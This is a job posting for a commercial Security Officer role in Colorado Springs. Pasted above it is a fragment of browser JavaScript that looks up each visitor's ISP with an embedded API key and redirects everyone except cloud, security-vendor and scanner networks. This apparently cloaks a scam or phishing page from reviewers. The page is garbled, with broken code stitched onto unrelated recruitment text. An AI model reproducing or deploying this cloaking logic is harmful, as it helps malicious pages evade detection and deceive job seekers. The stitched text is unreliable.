Security Officer (Commercial)
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Security Officer (Commercial) to ensure the safety and security of commercial properties in Colorado Springs, CO.
Responsibilities include:
- Patrolling assigned premises to monitor for security breaches or safety hazards.
- Monitoring surveillance equipment and inspecting buildings for security concerns.
- Responding promptly to alarms, incidents, and emergencies.
- Providing excellent customer service to employees, visitors, and clients.
- Completing detailed incident reports and maintaining security logs.
- Enforcing property rules and regulations to prevent theft, vandalism, and unauthorized access.
Skills needed:
- Strong observation and communication skills.
- Ability to remain calm and act decisively in high-pressure situations.
- Attention to detail and reliability.
- Basic knowledge of security equipment and procedures.
Benefits include:
- Competitive pay and opportunities for advancement.
- Health, dental, and vision insurance options.
- Paid time off and holiday pay.
- Training and professional development programs.